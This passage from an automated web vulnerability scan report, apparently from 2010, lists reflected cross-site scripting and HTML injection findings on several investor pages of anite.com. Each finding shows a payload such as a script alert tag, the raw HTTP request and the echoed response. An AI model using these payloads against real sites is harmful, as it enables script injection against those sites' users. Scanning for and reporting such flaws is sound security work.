This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-announcements.html?Itemid=471962d0"><a>d993314eedd HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-announcements.html?Itemid=471962d0"><a>d993314eedd#up">
...[SNIP]...

1.103. http://anite.com/investors-announcements.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/investors-announcements.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f0c9"><script>alert(1)</script>002477ac85b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7f0c9"><script>alert(1)</script>002477ac85b HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/7f0c9"><script>alert(1)</script>002477ac85b#up">
...[SNIP]...

1.104. http://anite.com/investors-announcements.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-announcements.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714a8"><a>61d0adb00eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-announcements.html?714a8"><a>61d0adb00eb=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-announcements.html?714a8"><a>61d0adb00eb=1#up">
...[SNIP]...

1.105. http://anite.com/investors-annual-reports-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-annual-reports-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e739e"><a>d3b1cd8044 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-annual-reports-2.html?Itemid=464e739e"><a>d3b1cd8044 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-annual-reports-2.html?Itemid=464e739e"><a>d3b1cd8044#up">
...[SNIP]...

1.106. http://anite.com/investors-annual-reports-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/investors-annual-reports-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd0f"><script>alert(1)</script>69378c1e14a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /acd0f"><script>alert(1)</script>69378c1e14a HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/acd0f"><script>alert(1)</script>69378c1e14a#up">
...[SNIP]...

1.107. http://anite.com/investors-annual-reports-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-annual-reports-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f545"><a>2315161db2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-annual-reports-2.html?7f545"><a>2315161db2b=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-annual-reports-2.html?7f545"><a>2315161db2b=1#up">
...[SNIP]...

1.108. http://anite.com/investors-corporate-calendar-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-corporate-calendar-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c3d"><a>138989098b was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-corporate-calendar-2.html?Itemid=47059c3d"><a>138989098b HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-corporate-calendar-2.html?Itemid=47059c3d"><a>138989098b#up">
...[SNIP]...

1.109. http://anite.com/investors-corporate-calendar-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/investors-corporate-calendar-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1809"><script>alert(1)</script>311ea12de90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e1809"><script>alert(1)</script>311ea12de90 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/e1809"><script>alert(1)</script>311ea12de90#up">
...[SNIP]...

1.110. http://anite.com/investors-corporate-calendar-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-corporate-calendar-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487b6"><a>bbc54237835 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-corporate-calendar-2.html?487b6"><a>bbc54237835=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-corporate-calendar-2.html?487b6"><a>bbc54237835=1#up">
...[SNIP]...

1.111. http://anite.com/investors-corporate-governance-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-corporate-governance-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ca8"><a>1651baf130b was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-corporate-governance-3.html?Itemid=459b4ca8"><a>1651baf130b HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-corporate-governance-3.html?Itemid=459b4ca8"><a>1651baf130b#up">
...[SNIP]...

1.112. http://anite.com/investors-corporate-governance-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/investors-corporate-governance-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4888"><script>alert(1)</script>b1b668f3295 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e4888"><script>alert(1)</script>b1b668f3295 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/e4888"><script>alert(1)</script>b1b668f3295#up">
...[SNIP]...

1.113. http://anite.com/investors-corporate-governance-3.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-corporate-governance-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4776f"><a>5b0a8f05f41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-corporate-governance-3.html?4776f"><a>5b0a8f05f41=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-corporate-governance-3.html?4776f"><a>5b0a8f05f41=1#up">
...[SNIP]...

1.114. http://anite.com/investors-share-price-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-share-price-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6af45"><a>5248da19b3c was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-share-price-2.html?Itemid=4696af45"><a>5248da19b3c HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-share-price-2.html?Itemid=4696af45"><a>5248da19b3c#up">
...[SNIP]...

1.115. http://anite.com/investors-share-price-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/investors-share-price-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d304d"><script>alert(1)</script>48f51a782cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d304d"><script>alert(1)</script>48f51a782cd HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/d304d"><script>alert(1)</script>48f51a782cd#up">
...[SNIP]...

1.116. http://anite.com/investors-share-price-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-share-price-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b8d"><a>1c6d1fdd2f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-share-price-2.html?76b8d"><a>1c6d1fdd2f2=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-share-price-2.html?76b8d"><a>1c6d1fdd2f2=1#up">
...[SNIP]...

1.117. http://anite.com/investors-share-price-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-share-price-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23398"><a>04285f2b500 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-share-price-3.html?Itemid=46823398"><a>04285f2b500 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
